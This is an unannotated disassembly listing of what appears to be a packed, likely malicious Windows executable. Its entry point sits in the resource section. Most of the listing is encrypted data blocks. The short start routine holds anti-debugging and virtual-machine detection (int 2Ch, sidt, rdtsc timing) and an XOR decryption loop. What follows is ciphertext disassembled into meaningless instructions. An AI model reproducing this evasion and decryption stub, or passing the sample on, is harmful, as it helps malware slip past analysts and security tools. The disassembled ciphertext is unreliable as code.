dd 0A36C46D3h, 8219097Dh, 12CCD1DCh, 4A11F80Fh, 0F1C01CC3h
dd 922D7B6h, 0AE647CDDh, 0EEABCDD5h, 9AE58C33h, 88DC1A94h
dd 60DD343Fh, 0E08CF1C4h, 44957CFAh, 0B84C0AE6h, 0F04DA4A2h
dd 0F8F9F854h, 1E3185D6h, 0C76E5AB7h, 0E67DA0DAh, 8BD1388Ch
dd 2EF2582Ch, 0B5B160C7h, 0FD8B8F1Fh, 5A759992h, 0BE14CDB3h
dd 95BBD057h, 0C61DB40Ah, 12F46DACh, 20D29864h, 0F229F84Ch
dd 0FDEB245Bh, 82078E4Ah, 35A38918h, 8DBED4CFh, 664E7FADh
dd 4F66D3A9h, 6E75A852h, 93492087h, 0B31A044Eh, 5A41DC6Eh
dd 0F6A50CF3h, 9A9FB663h, 3AA9806h, 0EAF16CDEh, 4C15BC43h
dd 0B8A895A8h, 926602FAh, 1C29BDB6h, 0B881086Bh, 720A9B9Ch
dd 6856BE63h, 57090069h, 9ADED9A1h, 0F9EFE007h, 3F9D8710h
dd 0AB44DF35h, 3E658C07h, 96B950D7h, 6C9A846Bh, 6A45B1AAh
dd 9435BD83h, 56A1496Ah, 0FFA8A6DBh, 7AE1488Bh, 0DAC5EFF7h
dd 0E3E99BF3h, 0D9453281h, 63B4F2AFh, 88B55CD7h, 234C57ACh
dd 966D848Fh, 0AE8168DFh, 4FA07B20h, 0A27950A3h, 72FD740Bh
dd 69F62F62h, 0BA953CC3h, 98793022h, 51C61770h, 0C323C574h
dd 9F2EAC13h, 0F265B13Eh, 0CFB89EB3h, 20D178BBh, 1A4459D4h
dd 0D2096087h, 7AD9043Bh, 0D9111079h, 8ACCC9B9h, 6852D017h
dd 26E20CADh, 9ED8BDA5h, 0A533FC43h, 0C618C510h, 568E241Bh
dd 4915893Fh, 0AAF4E964h, 2D9B037h, 0AB09F4ABh, 0CA92BF38h
dd 6B419C63h, 79E3B037h, 0BD22CFC8h, 1A3872DAh, 776D27F3h
dd 0EBCA6C5Fh, 0B26C717Ch, 0EAB158AFh, 4060BCC3h, 8640852Ah
dd 1E47645Bh, 79D8483Fh, 0DA08D4A0h, 0D23D34FAh, 6E5DD56Bh
dd 0E9FA33BFh, 9F4D3AA5h, 34228687h, 9EAD0B43h, 9AC12827h
dd 95032D31h, 2BBCFB8Fh, 0FEFB323Eh, 8117581Eh, 37FBF33h
dd 329DFCE2h, 0E78853DBh, 0BAE1488Bh, 6B55EC13h, 7A7267F1h
dd 0ADE4BF73h, 0B23AD01Ch, 633ECCC8h, 128999A5h, 8FEF51BAh
dd 0E380689Fh, 7A01C8F8h, 0B214AD1Eh, 0BB56744Bh, 6A71E1E9h
dd 0F717B9E8h, 0B71E8067h, 960DD0AAh, 0FAA148BFh, 86F2AE27h
dd 429D321Ch, 5BBEC3BDh, 8A910121h, 0F7F1D323h, 3A0960C6h
dd 76AD0476h, 5413ED54h, 8CD600F6h, 2EF59479h, 4E884BCBh
dd 23F1589Ah, 4E6C4286h, 0AAA213E7h, 0A9552767h, 79EAA04Ch
dd 683984A7h, 97524F88h, 0A63DED0Dh, 0C6D37B94h, 57F719EAh
dd 0D04A20C7h, 0F068CD33h, 0D101A866h, 4D5A2480h, 22F99097h
dd 79AB2163h, 4C0CD310h, 1815FC7Ah, 4D9FC94Fh, 0B058EFE4h
dd 0F1218846h, 94862499h, 41D75B3Bh, 0EEB21182h, 0A51B96Fh
dd 0AFAFD8ACh, 0E78AE047h, 0F66DBD51h, 0A3B39D9Ch, 2C9CC73h
dd 40BC5F3Fh, 0CB9D344Bh, 0AF5A9C69h, 8E9545F1h, 9AF9C664h
dd 29F2525Dh, 8347B53Ch, 6B45EC53h, 8E1E0BFCh, 27E6D724h
dd 46FAF84Fh, 0D71389DAh, 97C6A047h, 0B66DC5B6h, 0E3F3EDDCh
dd 0FF438C33h, 0AD5CEFAFh, 6DD888Eh, 6871536Fh, 9EA17FE8h
dd 0CD1FC9CFh, 30F0DD64h, 0F5A108C6h, 5E0548D6h, 0E81CF3B7h
dd 0E53DD4D2h, 0CAE84A0Ah, 5755723h, 50066C80h, 76AD04B6h
dd 1549EF24h, 0BEE58830h, 60795357h, 0C509F3C8h, 0EAC86A2Ah
dd 0F105AE03h, 0B210FE52h, 1E18DB5Bh, 6061C80Ah, 1BCAAC16h
dd 2D9B0C0h, 0A67D4842h, 0C56E44CFh, 6E3508E6h, 8777A087h
dd 3666C134h, 1C8AE85Fh, 0CAE627F2h, 0D7217847h, 3B640B74h
dd 0EAF16149h, 0CB16CB36h, 0B229390Dh, 2FBFE118h, 0FFA8C83Fh
dd 0DEC51519h, 472270BCh, 66FD2DA9h, 8F6AB07Dh, 0AEB56565h
dd 52B48935h, 845D84FBh, 9ADEC0A8h, 70E8CC33h, 0C9F8DB2Bh
dd 56DF3749h, 13BB1D14h, 82A07CC3h, 8DB904E4h, 0F2492BEAh
dd 0A10A69A3h, 8CC063D0h, 0E25970CEh, 1F8FE1A0h, 3CF9F80Fh
dd 8F4AE315h, 12C9A0AEh, 9D63B13Bh, 0D3F36498h, 712DCB48h
dd 5D862C15h, 83D23DF4h, 95CE26DDh, 4FB10048h, 32CDB180h
dd 69B21B9Bh, 7B9DA380h, 5E658819h, 71D710B7h, 0C2311F2Bh
dd 0B37FBD08h, 97F8DC63h, 0D20944F2h, 4FDF8178h, 0BF27A85Fh
dd 78CE0216h, 49AD9254h, 80DBB889h, 2B36F054h, 0E55FC51h
dd 0F22940E2h, 97162D2h, 8FEC4B61h, 9E8554DDh, 7E4C4F21h
dd 257D949Eh, 4E9E8737h, 6E359CD8h, 0AB1BA50Eh, 3687447Bh
dd 0EE941709h, 7BA54CC6h, 867D9FD7h, 0AD5DF48Bh, 80E1082Fh
dd 4F7FEC40h, 0B26900CFh, 833232DBh, 7A61FD23h, 0D17AD450h
dd 0C21C4EB3h, 30389D6Bh, 8751F836h, 0EECC062Eh, 301C6D47h
dd 0A72DC4C2h, 0CAC142CDh, 0BE159CCh, 1ABA5097h, 4A193BB4h
dd 4071982Ah, 0D8608383h, 8DA9805Eh, 9638244Eh, 45198BBFh
dd 1AB0681Ch, 7D030F7h, 26BD6D41h, 8912317Ch, 84E44CB2h
dd 0A736F103h, 0B62DFDEDh, 0EFE1FD20h, 0BEA08C33h, 0A6A89498h
dd 0CFEE740Bh, 535F5DE6h, 9FC43C83h, 32F6E876h, 691DE494h
dd 0BA94E86Ah, 51C52953h, 429D7A33h, 94B81DEBh, 49D178B6h
dd 2E1C119Bh, 0EA42EBC7h, 429C818Ch, 1A41A85Fh, 0B8905CB3h
dd 72D45554h, 142EB48Bh, 5B06D9ACh, 8BDC1DF4h, 0F269799Dh
dd 56A91FE3h, 62A033Fh, 8EA8E990h, 0D0EAB037h, 578A15A8h
dd 4F189938h, 6E75A515h, 0D9FE2F44h, 30EBD3Dh, 5519BBD2h
dd 0FDB14F44h, 0E392D9C7h, 78DF7A3h, 83C607D5h, 5361452Dh
dd 0B3657A24h, 5D468469h, 6E634343h, 53956ED0h, 35E63873h
dd 5D7C37B2h, 4A68D28Ah, 0FA7E9FA3h, 92BAF063h, 0F6950674h
dd 1102289Fh, 0B36E27FCh, 0A2011E6Ah, 9916C84Bh, 16DD511Ch
dd 0B2D30EE2h, 5EABB71Dh, 8A310EFBh, 94DDE4CBh, 1E793167h
dd 4BBAD882h, 63C055A0h, 3E11BD17h, 0ADE621E8h, 97C6A055h
dd 49923B88h, 8DBC6B54h, 7166C23Ah, 5D863613h, 458A49F4h
dd 0EE3E963Ah, 316AC3D8h, 1AAD71Ah, 86C9EBA9h, 0C75EB700h
dd 1151FF03h, 0BD9C74B8h, 3D0E6B14h, 752F1567h, 0D6F1D3DCh
dd 0E1F69F39h, 76BBECA9h, 75A9A81Fh, 561AB34Ch, 62B9D057h
dd 4CF03596h, 43F15880h, 0E55FF3Eh, 791BBF83h, 16B456EEh
dd 18E8EC3Fh, 0D3FBEDF5h, 245CBF2Dh, 2D7DD4A8h, 14924491h
dd 3E0E1D05h, 84CC2FC2h, 0C1ED4438h, 7A01FE1Ch, 7BAA0CF3h
dd 22F9931Eh, 8401B77Dh, 0E5911664h, 4E1740C7h, 3365E3A7h
dd 16CC65E2h, 94A7C77Fh, 36852CD1h, 3DE68EFAh, 645E9664h
dd 40DAB80Fh, 0A2BF5FB3h, 5389E0FFh, 18C5D5FBh, 0AA3ED775h
dd 7E51E3A6h, 0D219E1D7h, 6A904FEh, 0D451F22Fh, 9AAD244Ah
dd 8D43148Fh, 0D9DF2124h, 5832CA2Bh, 2A747922h, 67B230B7h
dd 26FD5243h, 4C79A14Fh, 0B6B51CE3h, 0ED2314EFh, 9FE84E44h
dd 5C8128EBh, 4A0CA6F7h, 27F110D7h, 69D4022h, 0EFC6388Dh
dd 0CED508F2h, 32E9802Fh, 2BCDEDEEh, 0FAE17CD4h, 0A9C0D852h
dd 2ADC132h, 0E63D97EBh, 0ACA4C8Eh, 6E41F59Eh, 627D65C7h
dd 4287B9FBh, 6E44A85Fh, 9558CC14h, 67B99063h, 43EA2ABFh
dd 0AAB12C9Eh, 8E55FC03h, 4FA94993h, 56CD1072h, 0B9E8FF3Dh
dd 0DEFCC236h, 8D31B077h, 4E822B5Fh, 356E850Fh, 6E37B98Bh
dd 0E4D4AB87h, 0DEED0402h, 0A5FE1481h, 0FCAE88FCh, 97729017h
dd 861DCDF9h, 0E98D0664h
dd 0B3CA549Dh, 3066FF58h, 16CD65EEh, 1A0582FEh, 55652CD3h
dd 0C14F22C9h, 1CBE0011h, 3BD44F1Fh, 0AEF51C97h, 2799E047h
dd 0CA9809F5h, 11C168ABh, 7E75A1BEh, 0B59DA3D7h, 46943BF2h
dd 2AC4152Fh, 7DD53C93h, 91A971C2h, 21A957D9h, 0FAD5393Ah
dd 1E45EC13h, 2ADD3FE7h, 0D9FD542Bh, 25F9D03Ch, 654AE312h
dd 52F00692h, 0B9BF41BBh, 0DA81FA5Bh, 0C900773h, 297950AEh
dd 4C5C6441h, 6A31B84Bh, 0C6DF1723h, 0FBDA8254h, 0AD599698h
dd 0BAB12572h, 33882753h, 3099B0A7h, 0C2011FBDh, 9ABC9D0Ch
dd 0AD75DC63h, 0D2090D60h, 0C26047Bh, 120BA917h, 4962BBB0h
dd 5B3F55DCh, 43EAB48Bh, 0AAB12C9Eh, 0E55FC43h, 0EADE4293h
dd 7F815658h, 94D4010Fh, 15C52CAAh, 32D89804h, 924C515Ch
dd 0CAD1788Fh, 6C419C63h, 7A183870h, 0C912B88Fh, 590D0306h
dd 8C8E2480h, 0D1AFC11Bh, 0B04AB2Fh, 0AA85645Ah, 11B14F43h
dd 20580FF9h, 171FE396h, 0EF1BC87Fh, 0DEC518FCh, 10707642h
dd 74894213h, 0E2AEE887h, 510A836Fh, 5EC36B1Dh, 13DCEF8h
dd 0DAF5191Ah, 3E65CC33h, 0E478DDC7h, 0CB14273Eh, 2A31A181h
dd 9EB8F980h, 0D52AC027h, 0D60DA4B6h, 92A223BFh, 273B59ECh
dd 5D030B7h, 26FD5479h, 0BD31BEC0h, 0AE812D66h, 12C9A007h
dd 0E46AB03Bh, 25784F37h, 0F3AED68Ch, 0A2392939h, 4D5477E8h
dd 7A7B5347h, 0F7E3B948h, 78D08067h, 1F4E9793h, 0B8A040B5h
dd 6662F43h, 381C7BB7h, 8E3DD4D2h, 8AD11CB3h, 777D9E22h
dd 585923C6h, 36992BEEh, 2BC45F1Fh, 0BEE50C87h, 16A9D057h
dd 0AB90B7CDh, 1CF158BFh, 3FD00B03h, 0F22900D3h, 238D265Bh
dd 0CDA7762Bh, 0DEF15D16h, 6D9B077h, 2C7BA1ABh, 8AA5487Ah
dd 5FB06B63h, 924960B3h, 43ED447Bh, 58066254h, 28A7A631h
dd 2B1267F5h, 446FF301h, 8675A45h, 2AC78FB4h, 3D0D222Ch
dd 0AB4E3C19h, 7A61F129h, 560123D3h, 3DE68FCCh, 268466DEh
dd 0CEC4470Fh, 51F51C96h, 12B08EF2h, 0CAB87BFBh, 17C168AAh
dd 7E5C96BEh, 80ACDDD7h, 179D7472h, 0D571F27Dh, 0CEEC2A36h
dd 0CA3C3F67h, 290DE4EEh, 0FAD85E0Ah, 22D01313h, 0F5970C2h
dd 66C51A9Eh, 18A4074Fh, 0B8B55CDAh, 277D35F8h, 13EEC4FBh
dd 0DAC15189h, 7ECD4F73h, 0FF791097h, 0EB5C7561h, 6A71EB26h
dd 0F9ACC9Bh, 72FC00A2h, 558D619Bh, 0A5E807Ch, 0DE806D5Ch
dd 8199B0A2h, 0CC3D84D6h, 0ECCD4D8Fh, 2251A0A2h, 0C17C11ABh
dd 8969EC1Bh, 1F3457E0h, 411E325Bh, 9D6B38A8h, 0E87C4B34h
dd 0FC893550h, 2BEDEE37h, 922940E7h, 0A97281B3h, 0B158FDC0h
dd 13F548D7h, 42E1FEC2h, 0AE2D5FABh, 0CCABF9A9h, 3810EF61h
dd 6D4920EFh, 5C29CF3Bh, 0A551BA5Fh, 0BE90F466h, 2A3D1317h
dd 0B901CA0Ah, 0E9C404D0h, 0A6117AC0h, 4D96FB8Ch, 0E9321BF3h
dd 0C2E2A980h, 0DE852CA7h, 0EDA1C1DCh, 8EBD146Bh, 0A51B81Fh
dd 16F57C61h, 5289E077h, 0F62D8713h, 9AE5EA9Fh, 324198BEh
dd 1ABA7E1Ah, 2684484Bh, 2A7198C7h, 0AA81F783h, 68229D57h
dd 0E21E495Ah, 830908FFh, 7FBA13F6h, 85593435h, 25F85529h
dd 5F8E149h, 0B146C183h, 5240C45Ah, 0C452h, 12C0h dup(0)
assume ds:_data
; =============== S U B R O U T I N E =======================================
public start
start proc near
cld
call loc_100E42E
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_100E406 proc near ; CODE XREF: .rsrc:0100E47D�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_100E40E: ; CODE XREF: sub_100E406+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_100E40E
pop ebx
retn
sub_100E406 endp
; ---------------------------------------------------------------------------
db 0FAh, 77h
; ---------------------------------------------------------------------------
loc_100E41F: ; CODE XREF: .rsrc:0100E468�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_100E421: ; CODE XREF: .rsrc:0100E436�j
; .rsrc:0100E447�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_100E455
; =============== S U B R O U T I N E =======================================
sub_100E42B proc near ; CODE XREF: .rsrc:0100E44A�p
; .rsrc:0100E450�p
rdtsc
retn
sub_100E42B endp
; ---------------------------------------------------------------------------
loc_100E42E: ; CODE XREF: start+1�p
test eax, eax
jnz short loc_100E43A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_100E421
jmp short loc_100E449
; ---------------------------------------------------------------------------
loc_100E43A: ; CODE XREF: .rsrc:0100E430�j
push eax
sidt fword ptr [esp-2]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short loc_100E421
loc_100E449: ; CODE XREF: .rsrc:0100E438�j
push ebp
call sub_100E42B
xchg eax, ecx
call sub_100E42B
loc_100E455: ; CODE XREF: .rsrc:0100E429�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 7006h
sub eax, 100h
jnb short loc_100E41F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_100E406 ; CODE XREF: .rsrc:0100E4E8�j
adc [edi-6], esi
db 2Eh
dec eax
loope loc_100E4EB
pop es
fisubr word ptr [ebx+4C36A9AAh]
cld
test [eax-2044CEB5h], ebx
mov cl, 0BBh
lodsb
cmpsb
enter 0FFFF95ECh, 5Bh
test eax, 7F92C404h
mov word ptr [esi], ss
out 0F3h, al
cmp [ebp-68h], ch
les esi, [edi-2604501Dh]
db 2Eh
int 0CEh ; used by BASIC while in interpreter
test eax, 485E2485h
db 3Eh
push eax
pop edi
test dword ptr [ecx+78h], 0BFE5DFE1h
pushf
mov dh, 7
jp short loc_100E4EF
pop dword ptr [ebp-1B7C8AD6h]
push edx
in al, dx
lodsb
pop esi
lodsb
shl dword ptr [eax+48h], 1
and ecx, eax
mov byte ptr [ecx+3Bh], 79h
pop ebp
mov ecx, 5A51D9D1h
push eax
outsb
loc_100E4E7: ; CODE XREF: .rsrc:0100E507�j
clc
jecxz short near ptr loc_100E47D+1
; ---------------------------------------------------------------------------
db 8Dh
; ---------------------------------------------------------------------------
loc_100E4EB: ; CODE XREF: .rsrc:0100E487�j
cli
push eax
stc
setalc
loc_100E4EF: ; CODE XREF: .rsrc:0100E4C7�j
lock repne lodsd
pop ecx
fucom st(7)
add ch, cl
pop edi
pop ecx
pop esp
adc eax, 0BCAFAEA3h
db 26h
js short loc_100E538
pop edi
fcmovnu st, st(3)
rep lodsb
jz short loc_100E4E7
repne xchg eax, edi
sbb al, 42h
mov ebp, 4ED0BA0h
add bh, [ebp+77h]
cmp [eax], ebx
sbb byte ptr [edx+3500AE89h], 3Ah
xor al, 0B6h
int 83h
xor eax, 0F1C7B693h
pushf
xor dword ptr [esi+eax*2+2026270Bh], 1697551Eh
in eax, 0F9h ; AT 80287 data.
; 286 sends opcodes & operands and receives results.
cmc
sti
das
loc_100E538: ; CODE XREF: .rsrc:0100E4FF�j
xchg ch, cl
mov ds:6DEEDBDAh, eax
mov ds:0D6BAE552h, eax
iret
; ---------------------------------------------------------------------------
db 0D2h, 4Fh, 0E2h
dd 0B90E5139h, 571535B3h, 9D221830h, 1A143F14h, 0D6060C39h
dd 0E105FBBDh, 0ECEBF0DDh, 0E777BBEAh, 0FA7B59D1h, 88407656h
dd 0C40F357Ch, 2E241A0Ch, 159074BDh, 3570E0Bh, 0C56FB1C0h
dd 7D99F3EFh, 4CA1640Bh, 4BE0FACEh, 0AF02FF4Ah, 3A853749h
dd 24AF2C19h, 13A88BA9h, 208917E6h, 0F74C974Dh, 447B0BF1h
dd 1A60564Fh, 0C9DDC73Dh, 0BF444A93h, 5BA2FB32h, 0CBEB2D6Bh
dd 1D9AB09Dh, 0ACED9786h, 0AD1684B1h, 1F0F693h, 0ACF79765h
dd 0CAD4EAFBh, 86C24389h, 0A4B8BEB8h, 0B52A85A0h, 0F817A2AFh
dd 890601A8h, 0FB6D0783h, 0E0F2C8E5h, 0EF7597F2h, 0AE732FD9h
dd 0E3A4CDA9h, 3DD03C36h, 2A75F21Ch, 29840B34h, 0BBE513h
dd 0EDD50179h, 38E8BD09h, 0E0666F01h, 0B24D21DBh, 464A6066h
dd 0F739E27Bh, 0ABD6B03Eh, 7137A6A3h, 0E5137215h, 7F848E87h
dd 70F6FC91h, 2FD916Bh, 0D0DAD0F6h, 1CC85D8Fh, 53BEC4C3h
dd 0AB586633h, 77A2ACA5h, 83FCDB17h, 5187E6DEh, 72F7FC93h
dd 4FC906Dh, 3FDBD1F4h, 0C94C535Bh, 105E503Ch, 0A8D93705h
dd 0F6A3A9A7h, 911519B3h, 0E0DE8DE1h, 8AF294F7h, 0D74619FAh
dd 9A2D09E1h, 0E74BE9D0h, 32C0C6F5h, 0AF30B5B3h, 21A242A9h
dd 0C7581C1Bh, 5C4C2C9h, 5BE46A00h, 5CE67141h, 5BEDF45Dh
dd 70C29C66h, 3FF1EBBEh, 59A03488h, 23A5A96Fh, 0B9BEA09Eh
dd 8898FBFh, 78F95885h, 97E8F872h, 0A3DFD5C8h, 4BDE5626h
dd 40F3E2F1h, 990C86BBh, 0DB58AD9Ch, 11161F1Eh, 88B93AAh
dd 556C8689h, 9B907543h, 0DB6468E4h, 4E53697Ch, 71EE4D74h
dd 0B3C8C23Bh, 3E2EA0ADh, 1C1B211Dh, 39A11214h, 7B8FFA03h
dd 0C7FCF2FBh, 0E362E9D6h, 0D06570D5h, 42C73235h, 0B5C5B833h
dd 0AB20B1AEh, 982D0FA5h, 7B708C71h, 0E6848805h, 6F73495Dh
dd 50CE7155h, 0D2A8A25Ah, 9F4EC0CCh, 5E3B413Fh, 28ADB256h
dd 0B6E098AFh, 0C31A97A4h, 0A7F5096Ch, 73710B87h, 228DEE0Bh
dd 0BE0EA65Fh, 0CBD3BBCEh, 8828D4F5h, 2AB30CB2h, 98AC2724h
dd 0F16C67DBh, 0DAE6DF7h, 0F277307Eh, 0CF8FEFECh, 7D5F26D3h
dd 2E6137E2h, 31C4A7E9h, 44B1DD60h, 9E234972h, 10FF5713h
dd 826DC981h, 0F4797F14h, 37AB9BE6h, 88530932h, 6646402Dh
dd 3F194774h, 7ADBF972h, 2B252B48h, 9997F74Eh, 0EE0D65C0h
dd 0A479EB7Eh, 3C85F39Ah, 0B05F6502h, 0B3BB86D4h, 33D6B616h
dd 6FB58B94h, 0ADD8A873h, 1498A218h, 86BE9C0Eh, 417DB390h
dd 6AEFFDE7h, 799288EFh, 5ED33457h, 45C84B78h, 3287A9BCh
dd 31A4CFD3h, 16ABB8CCh, 0C998EC42h, 127FB5AEh, 6CF1F7E2h
dd 0B50C062Ah, 2285ABADh, 0AE2E3B23h, 62DCD8D9h, 0C35E5D4Fh
dd 0E7CDA3E1h, 0BA24CC87h, 21040E84h, 3EF3C9DDh, 8A45013Ch
dd 0C7422225h, 41497F60h, 9CE9E7Eh, 0FE2F59A6h, 704B2EF4h
dd 9DF94515h, 0AD838986h, 1290BF9Dh, 90370A1Fh, 38B0A9B5h
dd 0C62E362Bh, 0E5283C96h, 212F0519h, 4AF7F160h, 71444F46h
dd 30A9F21Dh, 62327FFAh, 29FD913Bh, 3CDAD0F5h, 374E3850h
dd 0A92C157h, 0AD188F34h, 3535A8A6h, 0B41893F9h, 9779DBDEh
dd 74C7D1ADh, 43EA995Dh, 58EBCD0Dh, 351A0752h, 0C939051h
dd 0DAF1B236h, 0DE20EFF4h, 6DFB691Eh, 6E8FA9F8h, 89D294FEh
dd 0D8463DE5h, 2E1C67E2h, 39A6C788h, 0DC0C6C2h, 80D1A9F1h
dd 0E492F93h, 0BC631C2Ch, 16684F0Fh, 23AA0000h, 0B93D2421h
dd 0CE21B7B3h, 0CD607DA8h, 4B9B0842h, 9540C536h, 0CE2323A3h
dd 7D182E31h, 0F8756DE3h, 0B569FD52h, 16E4459h, 7424677Ch
dd 99525857h, 6B095F37h, 27C93C0Ah, 24988561h, 69E0CEF7h
dd 88C926Fh, 4AA40402h, 0BA2127BAh, 5DE380B4h, 0BDF5A53h
dd 4DAC9C98h, 706AFAB0h, 71DCD5FBh, 68FCCA1Fh, 9C036B6Eh
dd 7B30134Fh, 0BD232927h, 74357F18h, 15D55C69h, 0BC430DEBh
dd 0B5621865h, 27AC92FBh, 991E3483h, 0B909692h, 7D020805h
dd 0EF747A77h, 9EB5BAB8h, 0E37387CEh, 0E9937BCDh, 4C4982BBh
dd 756D5A53h, 0FE534761h, 68FFF9DBh, 15664563h, 82021F1Ch
dd 8DBDB7h, 0A7333629h, 2BCCA7BBh, 0DA4C3032h, 47B0C2D2h
dd 0F1505C56h, 4C94F4F2h, 0F567697Bh, 9F11381Eh, 26EAB188h
dd 0A33D072Dh, 25A792B4h, 0CB210B26h, 4ADCD1C5h, 0ED672A66h
dd 74E2FDFCh, 0E0677C5Bh, 0B409F318h, 29EB1EFh, 8B3B1000h
dd 3FBFBBB6h, 0CF2A1C20h, 2FD0DBD2h, 0C0435E6Ah, 7BCCFBEFh
dd 0E16B757Fh, 920EC17Fh, 3D8B8090h, 0B30C090Ch, 7EA2B4B0h
dd 0DE2A1975h, 5EDECFC9h, 0DB6D2E5Fh, 7DCED4F4h, 0E36D777Dh
dd 8D1BC381h, 0E9C9FB5h, 0AF161C24h, 3BA1B8BEh, 0C1073F2Ch
dd 75CCDBFCh, 0F64F5C44h, 17F9D8F6h, 0CF7A7156h, 0AFE5EAEAh
dd 6D97959Ch, 92100F20h, 3DA3B8B6h, 0AF21082Eh, 58DB8ED8h
dd 0E02C734Ah, 76D3D0C4h, 0EE7C6377h, 99ECE9CDh, 6FB59F9Bh
dd 0B212092Eh, 36ACADA2h, 0B7231420h, 58C8A1DAh, 0A96F4D43h
dd 4FD4C3E4h, 0CB627570h, 0B1E1E6EEh, 30939198h, 970D296Bh
dd 25B78589h, 0AF38331Fh, 5CF9C480h, 0D9556047h, 73CDC1D6h
dd 0FB715D17h, 72F4E9DFh, 36999292h, 0A2692E15h, 388D95BAh
dd 0AC20263Dh, 54D9AB8Ah, 0D9505A47h, 5ECDC6CEh, 0E5705C19h
dd 67E9E4DCh, 318B8992h, 840F0206h, 20AE8D95h, 0A4221353h
dd 7CACA7A7h, 0CC5D545Bh, 40CBE6A9h, 0F17F507Fh, 7CFAEFFFh
dd 16B4FFBEh, 8C022701h, 1DBBAC94h, 0CD2A393Ch, 51A4B788h
dd 0D45F507Fh, 53D5CAE6h, 0D4707374h, 62F9C08Fh, 1789516Fh
dd 991E1611h, 33ADB5E4h, 0BD223235h, 2985FBFBh, 0B2414848h
dd 47C8DFFCh, 0A56A6C7Bh, 70EEDFA2h, 1CAF0376h, 82291112h
dd 0EE18289h, 0A6152D32h, 3584AEA5h, 0D15E4F4Fh, 56CCDBD8h
dd 0F248215Eh, 65E4D5E5h, 13905566h, 9E14031Ah, 2A86BAE6h
dd 0B539321Eh, 27AAA49Eh, 0D1556C3Ch, 73ABC1CBh, 0E87C4E4Eh
dd 7DEAFCC4h, 1547614Bh, 0B8731C1Ah, 15919981h, 0BE16313Bh
dd 44AAA0A0h, 0C2523369h, 44C4F5D5h, 0EE512547h, 79FBF3D5h
dd 0C537D75h, 9C1C0D11h, 11828A8Fh, 0B1323008h, 3285D1A0h
dd 0D9583103h, 43E9D0C6h, 0D2214248h, 6BE1DAE2h, 0D0607F69h
dd 97141208h, 2AE99C9Fh, 0B329222Ah, 18A8A7B1h, 0DF5C2A30h
dd 54F4C4C7h, 0DD576726h, 64F4FEEAh, 0E1625E6Fh, 9A161608h
dd 2B9FBFEEh, 0B10B1301h, 2C80A2B7h, 0C8222217h, 2EDDD6DFh
dd 0D06A5F66h, 7BD1F3FFh, 0CA096A60h, 930BCE0Ah, 79FA39Eh
dd 0A92C0001h, 29BAB880h, 0CA0D4928h, 5ED0CBF7h, 0D6444879h
dd 14F7F0F5h, 0F45B6540h, 9B18F7EFh, 1886A386h, 0B0001210h
dd 21BEBC9Bh, 8E45323Ah, 57C2ECCEh, 0DD7A565Eh, 7BFED5EDh
dd 0E76B7D59h, 8E1EE8F0h, 6C9F989Dh, 0AC341D28h, 6B0AFB1h
dd 0B7333F23h, 51F4D3DDh, 0DF595E43h, 74E9F1A0h, 0E9667B47h
dd 0AFE4E3EBh, 9A8B82h, 0A10A3F0Fh, 1BEAEB4h, 0AA203D38h
dd 65ECC1D9h, 0C9596071h, 6AEAD1D0h, 0E37D7414h, 91F0ECF5h
dd 490909Bh, 8C080E6Ah, 20BABAB2h, 0B22E364Eh, 4CCEACA8h
dd 0CB414C50h, 6EA1C2C9h, 8E657A73h, 64EBEEFBh, 11998FFAh
dd 0E41C0B07h, 33AE8E97h, 0BC293C22h, 49D1A881h, 0C2517E51h
dd 1EC7C4C2h, 0F5607451h, 76E3E2F8h, 378398BBh, 83070101h
dd 3CBE9583h, 0BE2C2701h, 52F6C5A1h, 0C0435242h, 50ECDDCDh
dd 9254757Fh, 61F3E3C5h, 29D908Ch, 860F003Fh, 1BB090B7h
dd 0B8201D54h, 5BAEB4A3h
dd 0D1576A4Ch, 4ECDECCEh, 0D0571C79h, 4FD8CFD8h, 33D43233h
dd 0BB6C3E3Dh, 379D8386h, 8635253Ah, 6DC2B1A2h, 0C17B5D5Ch
dd 46EDC2CEh, 0D4605B64h, 60EFC28Fh, 0A997750h, 860F220Bh
dd 24A58391h, 0AB005817h, 34A199AFh, 0C75A5D6Ch, 65D0EBC9h
dd 93F3A31Eh, 60DD5ABBh, 91FE0402h, 0E8543AFEh, 5888E88Fh
dd 0A5070A06h, 110A47CCh, 0E768EAB0h, 77FBF0C7h, 0A89DD4Ch
dd 8A8EA4BDh, 0EEFF0AC7h, 0ED4254D0h, 9CEC2E64h, 78D3D10Eh
dd 70C8FEDEh, 0B55010C2h, 0B253BCC5h, 992E0868h, 8F9F5616h
dd 7D020895h, 8F201227h, 0B56DECE9h, 1FD35E31h, 45A290A7h
dd 0DD3C523Fh, 29C4E6B3h, 9B40724Bh, 5C92F295h, 0EAFB5A54h
dd 0F14650F4h, 0F617B7B4h, 0D56A4B90h, 1BB82D4Ah, 0ACBEC9CAh
dd 2753B683h, 8D22BDA8h, 0DE979AA7h, 53F95F5Eh, 0DF05FBF0h
dd 0EA67F0DDh, 0D75C7967h, 0B6318039h, 2AC5CDBCh, 0A0B28899h
dd 9F3FAFA8h, 0EED57499h, 683F1F4h, 0F54AACFCh, 7C607D62h
dd 0EBB66461h, 0C02F292Ch, 8D6ECDC0h, 5B743FB7h, 38A9A122h
dd 0FB989E80h, 7AF5EF10h, 342345F4h, 69EE1CA4h, 5A3D6663h
dd 7DC85E38h, 328D7947h, 1965C3Ch, 0F27C7F2Bh, 44CBF0CCh
dd 0AB0D87F0h, 0FDF984B1h, 0A66509D7h, 8062584Eh, 1AD4DE15h
dd 0C1464CA1h, 0DE39E3BBh, 0A51A2A98h, 82115DF5h, 893E0E91h
dd 0DB4DD4D3h, 6DD8F8D1h, 0B968AEE4h, 4B10591Eh, 0E3854E7Bh
dd 2F72457Ah, 0A708321Fh, 0DAC3A48Bh, 8A7A1779h, 8E7DBB7Ah
dd 0EAE105F3h, 899618A9h, 53D8DED0h, 0C61180C6h, 8231FEEFh
dd 0A91E2ED5h, 1AAC1C28h, 7991815h, 0FF848B8Fh, 0BADD04FAh
dd 10A3E50Bh, 50AE817Bh, 2CB9B008h, 36794703h, 0F8E4BD64h
